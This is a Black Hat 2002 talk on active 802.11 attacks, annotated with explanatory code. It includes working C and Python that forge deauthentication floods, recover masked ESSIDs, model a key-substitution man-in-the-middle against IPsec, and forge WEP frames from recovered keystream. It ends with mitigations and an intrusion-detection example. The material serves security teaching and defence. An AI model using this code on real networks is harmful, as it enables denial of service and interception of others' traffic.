Advanced 802.11 Attack. Mike Lynn & Robert Baird. Black Hat 2002, Las Vegas NV, 7/31/2002.

What Is NOT Covered
Wired Equivalent Privacy (WEP) vulnerabilities
WEP key cracking techniques
Radio signal amplification
Suggested changes to the IEEE 802.11b specification
Wireless network discovery tools

What Will Be Covered
Wireless network best practices
Practical attacks
The focus of the attack(s)
 The network layers
 The bottom 2 layers
 Custom (forged) 802.11b management frames
The Tool Box
 Drivers
 Utilities
 Proof of concept code

What Will Be Covered (continued)
Attack Scenarios
 Denial of service
 Masked ESSID detection
 802.11b layer MITM attack
 Inadequate VPN implementations
Mitigation Strategies

Wireless Best Practices
Enable WEP (Wired Equivalent Privacy)
Key rotation when equipment supports it
Disable broadcast of ESSID
Block null ESSID connection
Restrict access by MAC address
Use VPN technology
Use strong mutual authentication

Practical Attacks
WEP: can be cracked passively
Masked ESSID: can be passively observed in management frames during association
Block null ESSID connects: same problem
Install VPN: a weakly authenticated VPN is susceptible to active attack (MITM)
Strong mutual authentication: ?

The Network Layers (diagram)

The Bottom Layers
Manipulating the bottom 2 layers of the OSI model
Data Link (Layer 2)
 Media Access Control (MAC): access to the medium
 Logical Link Control (LLC): frame sync, flow control
Physical (Layer 1)
 Radio bit stream
 Divided into channels

The Bottom Layers (diagram)

Management Frames
Management frames can control link characteristics and physical medium properties
802.11b management frames are NOT authenticated
Why is this bad?

The Tool Box
Custom Drivers
 Air-Jack
  Custom driver for PrismII (HFA384x) cards
  MAC address setting/spoofing
  Send custom (forged) management frames
  AP forgery/fake AP
 Lucent/Orinoco
  Linux driver modified to allow MAC address setting/spoofing from the command line
Utilities
 User space programs: wlan-jack, essid-jack, monkey-jack, kracker-jack

Air-Jack Driver
Allows control of wireless card modes
Modes 0 and 1: standard documented modes
 IBSS (0, ad hoc) or BSS (1, infrastructure)
Pseudo-IBSS (3) mode
 Control channel selection
 Firmware handles timing-sensitive functions
Mode 5: undocumented
 Channel selection
 Firmware handles time-sensitive functions
 No beacons sent
 Very little firmware intervention

Air-Jack Driver (continued)
Mode 6: Host Access Point mode
 Sends beacons (firmware control)
 Responds to probe requests
 Handles time-sensitive functions
Can enable PrismII monitor mode
Uses the Linux PF_PACKET interface for RX and TX of raw frames

Air-Jack Driver

```c
/* send_deauth() from the slide: forge one deauthentication frame and hand it to
 * the Air-Jack driver over its raw PF_PACKET socket.  struct a3_80211 (fields
 * mh_type, mh_subtype, mh_mac1..mh_mac3) and the FC_TYPE_MGT / MGT_DEAUTH
 * constants come from the Air-Jack driver header, which the slide does not name. */
#include <string.h>
#include <sys/socket.h>
#include <linux/types.h>

extern int sock;   /* PF_PACKET socket bound to the Air-Jack interface; the slide calls it `socket` */

void send_deauth(__u8 *dst, __u8 *bssid)
{
    struct {
        struct a3_80211 hdr;   /* three-address 802.11 header */
        __u16 reason;          /* deauthentication reason code */
    } frame;

    memset(&frame, 0, sizeof(frame));
    frame.hdr.mh_type = FC_TYPE_MGT;         /* management frame ...            */
    frame.hdr.mh_subtype = MGT_DEAUTH;       /* ... subtype deauthentication    */
    memcpy(&(frame.hdr.mh_mac1), dst, 6);    /* addr1: victim or broadcast      */
    memcpy(&(frame.hdr.mh_mac2), bssid, 6);  /* addr2: source, spoofed as the AP */
    memcpy(&(frame.hdr.mh_mac3), bssid, 6);  /* addr3: BSSID                    */
    frame.reason = 1;                        /* reason code 1: unspecified      */
    send(sock, &frame, sizeof(frame), 0);    /* raw TX; the card appends the FCS */
}
```

Attack Scenarios – WLAN-Jack
Denial of Service: de-authentication
Use the MAC address of the access point
Send deauthenticate frames
 Send continuously
 Send to the broadcast address or to a specific MAC
Users are unable to reassociate with the AP
Air-Jack + WLAN-Jack
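The frame WLAN-Jack sends, built and then decoded field by field, as an added example written for this page in Python; it is not Air-Jack or WLAN-Jack code. The addresses are constructed; the frame-control byte 0xC0 (management, subtype 12) and reason code 1 are the 802.11 values the slide's send_deauth() sets. The point the decoder makes is that the only thing tying the frame to the AP is a source address the attacker typed in.

```python
import struct

# Frame control: 2-bit protocol version, 2-bit type, 4-bit subtype, then flags.
FC_TYPE_MGT = 0            # management frame
MGT_DEAUTH = 0x0C          # subtype 12: deauthentication
REASON_UNSPECIFIED = 1     # the reason code the slide's send_deauth() uses
BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT_HDR = "<HH6s6s6sH"    # frame control, duration, addr1, addr2, addr3, seq control (little-endian)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst: str, bssid: str, seq: int = 0, reason: int = REASON_UNSPECIFIED) -> bytes:
    """Forge a deauthentication frame that claims to come from the AP.

    Wire layout: FC(2) duration(2) addr1=DA(6) addr2=SA(6) addr3=BSSID(6) seqctl(2) reason(2).
    There is no MIC or signature over any of it; the card appends only the FCS.
    """
    fc = (FC_TYPE_MGT << 2) | (MGT_DEAUTH << 4)          # version 0, no flags: first byte 0xC0
    hdr = struct.pack(MGMT_HDR, fc, 0, mac_bytes(dst), mac_bytes(bssid),
                      mac_bytes(bssid), (seq & 0xFFF) << 4)
    return hdr + struct.pack("<H", reason)


def deauth_flood(bssid: str, dst: str = BROADCAST, count: int = 64) -> list:
    """WLAN-Jack's loop: the same forged frame sent continuously, with increasing
    sequence numbers, to the broadcast address or to one station."""
    return [build_deauth(dst, bssid, seq=i) for i in range(count)]


def decode_deauth(frame: bytes) -> dict:
    """Decode a captured deauthentication frame into the fields a sniffer would show."""
    if len(frame) < 26:
        raise ValueError("truncated frame")
    fc, _duration, a1, a2, a3, seqctl = struct.unpack(MGMT_HDR, frame[:24])
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if (ftype, subtype) != (FC_TYPE_MGT, MGT_DEAUTH):
        raise ValueError("not a deauthentication frame")
    (reason,) = struct.unpack("<H", frame[24:26])
    return {"da": mac_str(a1), "sa": mac_str(a2), "bssid": mac_str(a3),
            "seq": seqctl >> 4, "reason": reason}


if __name__ == "__main__":
    frames = deauth_flood("00:02:2d:11:22:33")   # constructed AP MAC, not from the slides
    print(frames[0].hex())
    print(decode_deauth(frames[5]))
```

A sensor that decodes these frames sees a deauthentication "from" the AP's own MAC to every station; nothing in the frame lets it tell the forgery from the real thing, which is why the detection has to rely on rate and context rather than on the frame contents.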

Attack Scenarios – WLAN-Jack (diagram)

Attack Scenarios – WLAN-Jack: Airopeek trace (screenshot)

Attack Scenarios – WLAN-Jack: Airopeek trace (screenshot)

Attack Scenarios – WLAN-Jack: decode of deauthentication frame (screenshot)

Attack Scenarios – WLAN-Jack: this is your connection

Attack Scenarios – WLAN-Jack: this is your connection on WLAN-Jack.

Attack Scenarios – ESSID-Jack
Is the ESSID a shared secret?
If I mask the ESSID from the AP beacons, then unauthorized users will not be able to associate with my AP?
Discover a masked ESSID
Send a deauthenticate frame to the broadcast address
Obtain the ESSID contained in the client probe request or the AP probe response
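The passive half of ESSID-Jack, as an added example written for this page (not the tool's own code): a parser for the SSID information element in beacons, probe requests and probe responses, run over a constructed capture in which the AP's beacons carry a zero-length SSID and a client then re-associates. The AP and client addresses and the SSID "corpnet" are made up; the frame layout (24-byte management header, 12 bytes of fixed fields in beacons and probe responses, then tag/length/value elements) is 802.11's.

```python
import struct

MGT_PROBE_REQ, MGT_PROBE_RESP, MGT_BEACON = 4, 5, 8   # management subtypes
IE_SSID, IE_RATES = 0, 1                                # information element tags
MGMT_HDR = "<HH6s6s6sH"                                 # FC, duration, addr1, addr2, addr3, seqctl


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value


def mgmt_frame(subtype: int, da: str, sa: str, bssid: str, body: bytes) -> bytes:
    fc = subtype << 4                                    # type 0 (management), no flags
    return struct.pack(MGMT_HDR, fc, 0, mac_bytes(da), mac_bytes(sa), mac_bytes(bssid), 0) + body


def parse_ies(data: bytes) -> dict:
    """Walk the tag/length/value list that follows the fixed fields."""
    out, i = {}, 0
    while i + 2 <= len(data):
        tag, length = data[i], data[i + 1]
        out[tag] = data[i + 2:i + 2 + length]
        i += 2 + length
    return out


def ssid_of(frame: bytes):
    """(bssid, ssid) for frames that carry an SSID element; ssid == "" means a masked
    (zero-length) SSID. None for frames of any other subtype."""
    fc, _, a1, a2, a3, _ = struct.unpack(MGMT_HDR, frame[:24])
    if (fc >> 2) & 0x3 != 0:
        return None
    subtype = (fc >> 4) & 0xF
    if subtype in (MGT_BEACON, MGT_PROBE_RESP):
        body = frame[24 + 12:]       # skip timestamp(8), beacon interval(2), capability(2)
    elif subtype == MGT_PROBE_REQ:
        body = frame[24:]            # probe requests have no fixed fields
    else:
        return None
    ssid = parse_ies(body).get(IE_SSID)
    if ssid is None:
        return None
    return mac_str(a3), ssid.decode("utf-8", "replace")


def harvest_ssids(capture) -> dict:
    """Map each BSSID to the first non-empty SSID seen for it. Masked beacons contribute
    nothing; the probe request/response that follows a (forced) re-association does."""
    found = {}
    for frame in capture:
        hit = ssid_of(frame)
        if hit and hit[1] and hit[0] not in found:
            found[hit[0]] = hit[1]
    return found


# Constructed capture (not from the talk): one AP with a masked SSID, one client re-associating.
AP, CLIENT = "00:02:2d:11:22:33", "00:02:2d:aa:bb:cc"
FIXED = struct.pack("<QHH", 0, 100, 0x0011)              # timestamp, interval, capability (ESS + privacy)
RATES = ie(IE_RATES, bytes([0x82, 0x84, 0x8b, 0x96]))

masked_beacon = mgmt_frame(MGT_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP, FIXED + ie(IE_SSID, b"") + RATES)
probe_req = mgmt_frame(MGT_PROBE_REQ, AP, CLIENT, AP, ie(IE_SSID, b"corpnet") + RATES)
probe_resp = mgmt_frame(MGT_PROBE_RESP, CLIENT, AP, AP, FIXED + ie(IE_SSID, b"corpnet") + RATES)
CAPTURE = [masked_beacon, masked_beacon, probe_req, probe_resp]

if __name__ == "__main__":
    print(ssid_of(masked_beacon))      # ('00:02:2d:11:22:33', '')
    print(harvest_ssids(CAPTURE))      # {'00:02:2d:11:22:33': 'corpnet'}
```

Masking only empties the SSID element in beacons. The client still names the network in its probe request and the AP repeats it in the probe response, and a broadcast deauthentication forces exactly that exchange on demand, so the "secret" is recoverable within one association.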

Attack Scenarios – ESSID-Jack (diagram)

Attack Scenarios – ESSID-Jack: Airopeek trace (screenshot)

Attack Scenarios – ESSID-Jack: Airopeek trace (screenshot)

Attack Scenarios – Monkey-Jack
MITM attack: taking over connections at layers 1 and 2
Insert the attack machine between the victim and the access point
Management frames: deauthenticate the victim from the real AP
 Send deauthenticate frames to the victim using the access point's MAC address as the source

Attack Scenarios – Monkey-Jack (continued)
The victim's card scans channels to search for a new AP
The victim's card associates with the fake AP on the attack machine
 The fake AP is on a different channel than the real one
 The attack machine's fake AP duplicates the MAC address and ESSID of the real AP

Attack Scenarios – Monkey-Jack (continued)
The attack machine associates with the real AP
 The attack machine duplicates the MAC address of the victim's machine
The attack machine is now inserted and can pass frames through in a manner that is transparent to the upper-layer protocols

Attack Scenarios – Monkey-Jack: before Monkey-Jack (diagram)

Attack Scenarios – Monkey-Jack: after Monkey-Jack (diagram)

Attack Scenarios – Monkey-Jack (diagram)

Attack Scenarios – Kracker-Jack
Dangers of wireless MITM
Wireless networks are more vulnerable to MITM attacks than wired networks
Many security solutions are implemented with an assumption of a secure layer 1 and 2
Many VPN solutions are implemented with inadequate authentication for protection against wireless MITM attacks

Attack Scenarios – Kracker-Jack
WAVEsec
An open source software solution for securing wireless networks
Uses the FreeS/WAN IPsec implementation
Will thwart passive eavesdropping of wireless network communications
Implementation options
 X.509 certificates
 Secure DNS

Attack Scenarios – Kracker-Jack
Authenticating with the WAVEsec gateway
Client sends a modified DHCP request carrying the client's public key
WAVEsec gateway inserts the client's public key into a DNS record
Client obtains the WAVEsec gateway's public key by requesting it from the DNS server
IPsec tunnel setup

Attack Scenarios – Kracker-Jack
Using Kracker-Jack
KJ inserts itself at layers 1 and 2 (like Monkey-Jack)
KJ, using a DNS request, gets the victim's public key from the DNS server
KJ, using the victim's MAC address, sends a DHCP request with its own key to replace the victim's key in the DNS server

Attack Scenarios – Kracker-Jack
KJ initiates an ISAKMP main mode SA with the WAVEsec server
KJ initiates an ISAKMP main mode SA with the victim
Victim gets the "new" server key by a DNS request serviced by KJ
Two separate IPsec tunnels are now set up
All traffic passes through KJ in the clear: KJ terminates both tunnels and holds both sets of keys

Attack Scenarios – Kracker-Jack (diagram)

Attack Scenarios – Kracker-Jack
IKE – ISAKMP/Oakley Phase 1
 Messages 1 and 2: negotiate characteristics of the security association; no authentication
 Messages 3 and 4: exchange random values (nonces) and execute a Diffie-Hellman exchange to establish a master key (SKEYID); no authentication
 Messages 5 and 6: exchange information for mutually authenticating the parties: identity payload, signature payload, and OPTIONAL certificate payload
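The Kracker-Jack sequence from the preceding slides (key lookup, key replacement through the unauthenticated DHCP-to-DNS path, then two separate main-mode exchanges) reduced to a runnable model, as an added example written for this page. It is not WAVEsec, FreeS/WAN or Kracker-Jack code and it makes three simplifications that are labelled in the comments: the Diffie-Hellman group is a toy (the Mersenne prime 2^127 - 1, not an IKE group), a toy Schnorr-style signature stands in for the RSA/X.509 signature in messages 5 and 6, and the DNS zone is a dictionary that anyone can write to, which is exactly the property the attack relies on. Identities and MACs are made up.

```python
import hashlib
import hmac
import secrets

# Toy group for the demo, NOT an IKE group: P is the Mersenne prime 2**127 - 1.
P = (1 << 127) - 1
G = 5
NBYTES = 16


def i2b(x: int) -> bytes:
    return x.to_bytes(NBYTES, "big")


def sign(priv: int, msg: bytes):
    """Toy Schnorr-style signature; stands in for the RSA signature of messages 5/6."""
    k = secrets.randbelow(P - 2) + 2
    r = pow(G, k, P)
    e = int.from_bytes(hashlib.sha256(i2b(r) + msg).digest(), "big")
    return r, (k - priv * e) % (P - 1)


def verify(pub: int, msg: bytes, sig) -> bool:
    r, s = sig
    e = int.from_bytes(hashlib.sha256(i2b(r) + msg).digest(), "big")
    return (pow(G, s, P) * pow(pub, e, P)) % P == r


class Peer:
    def __init__(self, ident: str, priv: int = None):
        self.ident = ident                                              # identity payload: the MAC, as WAVEsec keys DNS by MAC
        self.priv = priv if priv is not None else secrets.randbelow(P - 2) + 2   # long-term signing key
        self.pub = pow(G, self.priv, P)

    def impersonate(self, ident: str) -> "Peer":
        """Same long-term key, someone else's identity (MAC spoofing)."""
        return Peer(ident, self.priv)


class KeyDirectory:
    """The DNS zone the WAVEsec gateway fills from DHCP requests. publish() takes no
    credential: whoever can send a DHCP request from a MAC owns that MAC's key."""
    def __init__(self):
        self.keys = {}

    def publish(self, ident, pub):
        self.keys[ident] = pub

    def lookup(self, ident):
        return self.keys[ident]


def main_mode(init: Peer, resp: Peer, init_lookup, resp_lookup):
    """IKE main mode reduced to what matters here; messages 1-2 (SA proposal) omitted.
    Returns (both signatures verified, SKEYID)."""
    # Messages 3-4: nonces and Diffie-Hellman values, sent without any authentication.
    xi, xr = secrets.randbelow(P - 2) + 2, secrets.randbelow(P - 2) + 2
    gi, gr = pow(G, xi, P), pow(G, xr, P)
    ni, nr = secrets.token_bytes(16), secrets.token_bytes(16)
    shared = pow(gr, xi, P)
    skeyid = hmac.new(ni + nr, i2b(shared), hashlib.sha1).digest()   # SKEYID = prf(Ni|Nr, g^xy)
    # Messages 5-6: identities plus signatures binding the DH values and nonces.
    transcript = i2b(gi) + i2b(gr) + ni + nr
    sig_i = sign(init.priv, transcript + init.ident.encode())
    sig_r = sign(resp.priv, transcript + resp.ident.encode())
    # Each side checks the signature against whatever key ITS lookup returns.
    ok_r = verify(resp_lookup(init.ident), transcript + init.ident.encode(), sig_i)
    ok_i = verify(init_lookup(resp.ident), transcript + resp.ident.encode(), sig_r)
    return ok_i and ok_r, skeyid


def kracker_jack(victim: Peer, gateway: Peer, attacker: Peer, dns: KeyDirectory, pinned_gateway_key=None):
    """Returns (gateway-side ok, victim-side ok, SKEYID of tunnel 1, SKEYID of tunnel 2)."""
    victim_real_key = dns.lookup(victim.ident)          # KJ fetches the victim's key from DNS
    dns.publish(victim.ident, attacker.pub)             # forged DHCP request from the victim's MAC
    # Tunnel 1: attacker posing as the victim, to the gateway; the gateway verifies against DNS.
    ok_gw, key_gw = main_mode(attacker.impersonate(victim.ident), gateway, dns.lookup, dns.lookup)
    # Tunnel 2: victim to attacker posing as the gateway. The victim's DNS query is answered by
    # KJ, unless the client holds the gateway's key pinned out of band.
    if pinned_gateway_key is not None:
        victim_lookup = lambda ident: pinned_gateway_key
    else:
        victim_lookup = lambda ident: attacker.pub
    ok_v, key_v = main_mode(victim, attacker.impersonate(gateway.ident),
                            victim_lookup, lambda ident: victim_real_key)
    return ok_gw, ok_v, key_gw, key_v
```

Both signatures in messages 5 and 6 verify correctly in the attack run; nothing in IKE is broken. The flaw is that the key each side verifies against came over a path the attacker controls (a forged DHCP update on the gateway side, a DNS answer served by KJ on the client side), which is what "inadequate authentication" on the earlier slide means in concrete terms. With the gateway's key pinned on the client, the second tunnel fails and the attacker is left with a one-sided association it cannot use.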

Attack Scenarios – Kracker-Jack
IKE – ISAKMP/Oakley Phase 2 – Oakley Quick Mode
 Define security associations
 Define keys used to protect IP datagrams

Attack Scenarios – Shared Key Authentication Attack
Observe the plaintext challenge
Observe the ciphertext response
XOR plaintext with ciphertext to get the keystream
XOR an IP packet with the keystream, reusing the IV
Broadcast ping
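The five steps above, carried through end to end, as an added example written for this page (not the talk's code). WEP's RC4, the ICV and the 802.11 shared-key authentication frame layout are the real ones; the 40-bit key, the IV and the challenge bytes are constructed stand-ins for values that would be captured off the air. The frame the eavesdropper forges at the end decrypts cleanly at the AP although the attacker never learned the key.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 exactly as WEP uses it: key = IV || secret, no keystream discarded."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: a plain CRC-32, which anyone can compute."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """WEP body: IV(3) | key-id byte | RC4(IV||secret)(plaintext || ICV)."""
    return iv + bytes([key_id << 6]) + rc4(iv + secret, plaintext + icv(plaintext))


def wep_decrypt(secret: bytes, body: bytes) -> bytes:
    iv, ct = body[:3], body[4:]
    pt = rc4(iv + secret, ct)
    data, tag = pt[:-4], pt[-4:]
    if icv(data) != tag:
        raise ValueError("bad ICV")
    return data


def auth_msg3_body(challenge: bytes) -> bytes:
    """Shared-key authentication frame 3 before encryption: algorithm=1 (shared key),
    sequence=3, status=0, then the challenge-text element (tag 16, 128 bytes)."""
    return struct.pack("<HHH", 1, 3, 0) + bytes([16, len(challenge)]) + challenge


def recover_keystream(challenge: bytes, encrypted_msg3: bytes):
    """Step 1-3: frame 2 carries the challenge in the clear, frame 3 carries it encrypted.
    plaintext XOR ciphertext is 140 bytes of keystream, valid for the IV it was seen with."""
    iv = encrypted_msg3[:3]
    pt = auth_msg3_body(challenge)
    pt += icv(pt)
    ks = bytes(a ^ b for a, b in zip(pt, encrypted_msg3[4:]))
    return iv, ks


def forge_wep(iv: bytes, keystream: bytes, payload: bytes, key_id: int = 0) -> bytes:
    """Step 4: encrypt an arbitrary packet with the same IV and keystream and a CRC the
    attacker computes; the AP's ICV check passes without the attacker holding the key."""
    pt = payload + icv(payload)
    if len(pt) > len(keystream):
        raise ValueError("payload longer than the recovered keystream")
    return iv + bytes([key_id << 6]) + bytes(a ^ b for a, b in zip(pt, keystream))


# Constructed demo values (not from the talk): a 40-bit key, one IV, a fixed "random" challenge.
SECRET = bytes.fromhex("0123456789")
IV = bytes.fromhex("a1b2c3")
CHALLENGE = bytes(range(128))

if __name__ == "__main__":
    msg3 = wep_encrypt(SECRET, IV, auth_msg3_body(CHALLENGE))   # what the client transmits
    iv, ks = recover_keystream(CHALLENGE, msg3)                 # what the eavesdropper learns
    frame = forge_wep(iv, ks, b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"forged datagram")
    print(wep_decrypt(SECRET, frame))                            # the AP accepts and decrypts it
```

The recovered keystream is only 140 bytes, which bounds the forged packet, but that is enough for a broadcast ping; the AP re-encrypts the reply, so every such exchange also yields fresh known plaintext under another IV.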

Mitigation Strategies
Big guy with a stick
Wireless IDS and monitoring
 AirDefense
VPN + strong mutual authentication
RF signal shaping: avoiding signal leaks
 Antennas with a directional radiation pattern
 Lower access point power
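What the wireless IDS line above comes down to in practice, as an added example written for this page rather than any product's detection logic: three rules over the fields a monitor-mode sensor pulls from each 802.11 header, run against a constructed capture that replays the WLAN-Jack flood and the Monkey-Jack channel move described earlier. Addresses, timings and thresholds are all made up; the rules are rate- and context-based because, as the deauthentication example showed, the frames themselves carry nothing to verify.

```python
from collections import defaultdict, deque

# Constructed monitor-mode records (not from the talk): (time_s, channel, kind, sa, da, bssid).
AP, CLIENT, BCAST = "00:02:2d:11:22:33", "00:02:2d:aa:bb:cc", "ff:ff:ff:ff:ff:ff"


def constructed_capture():
    rec = [(k * 0.1, 6, "beacon", AP, BCAST, AP) for k in range(30)]          # real AP, channel 6
    rec.append((1.0, 6, "deauth", CLIENT, AP, AP))                             # one client leaving: benign
    rec += [(2.0 + k * 0.02, 6, "deauth", AP, BCAST, AP) for k in range(20)]  # WLAN-Jack flood
    rec += [(2.6 + k * 0.1, 11, "beacon", AP, BCAST, AP) for k in range(10)]  # Monkey-Jack fake AP
    return sorted(rec)


def deauth_floods(records, threshold=10, window=1.0):
    """A source that sends `threshold` deauth frames within `window` seconds. Per-source
    sliding window, one alert per source. Broadcast-addressed deauths are called out
    because an AP normally deauthenticates a single station."""
    recent, flagged, alerts = defaultdict(deque), set(), []
    for t, ch, kind, sa, da, bssid in records:
        if kind != "deauth":
            continue
        q = recent[sa]
        q.append((t, da))
        while t - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold and sa not in flagged:
            flagged.add(sa)
            alerts.append({"rule": "deauth_flood", "sa": sa, "t": t, "count": len(q),
                           "broadcast": any(d == BCAST for _, d in q)})
    return alerts


def cloned_aps(records):
    """A BSSID beaconing on more than one channel: the Monkey-Jack fake AP copies the
    real AP's MAC and ESSID but has to sit on a different channel."""
    channels = defaultdict(set)
    for t, ch, kind, sa, da, bssid in records:
        if kind == "beacon":
            channels[bssid].add(ch)
    return [{"rule": "cloned_ap", "bssid": b, "channels": sorted(c)}
            for b, c in channels.items() if len(c) > 1]


def possible_mitm(records, gap=2.0):
    """Correlate the two: a deauth flood 'from' an AP followed within `gap` seconds by that
    BSSID appearing on another channel is the Monkey-Jack sequence from the slides."""
    floods = {f["sa"]: f for f in deauth_floods(records)}
    out = []
    for clone in cloned_aps(records):
        flood = floods.get(clone["bssid"])
        if flood is None:
            continue
        beacons = [(t, ch) for t, ch, kind, sa, da, b in records
                   if kind == "beacon" and b == clone["bssid"]]
        home = beacons[0][1]                                   # channel the BSSID was first seen on
        moved = [(t, ch) for t, ch in beacons if ch != home and t >= flood["t"]]
        if moved and moved[0][0] - flood["t"] <= gap:
            out.append({"rule": "possible_mitm", "bssid": clone["bssid"], "home_channel": home,
                        "rogue_channel": moved[0][1], "delay_s": round(moved[0][0] - flood["t"], 2)})
    return out


if __name__ == "__main__":
    cap = constructed_capture()
    for alert in deauth_floods(cap) + cloned_aps(cap) + possible_mitm(cap):
        print(alert)
```

The single client deauthentication at t=1.0 raises nothing, the twenty spoofed frames trip the flood rule on the tenth, and the correlated rule fires only when the same BSSID shows up on a new channel shortly afterwards, which is the signal that separates a noisy neighbour from an attacker inserting a fake AP. A sensor that cannot hop channels will miss the second half.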

Summary
Wireless networks are more susceptible to active attacks than wired networks
Enable all built-in security capabilities
Use a VPN with strong mutual authentication
Monitor the wireless network medium (air space) for suspicious activity
Updates: Black Hat web site or

Advanced 802.11 Attack
Robert Baird & Mike Lynn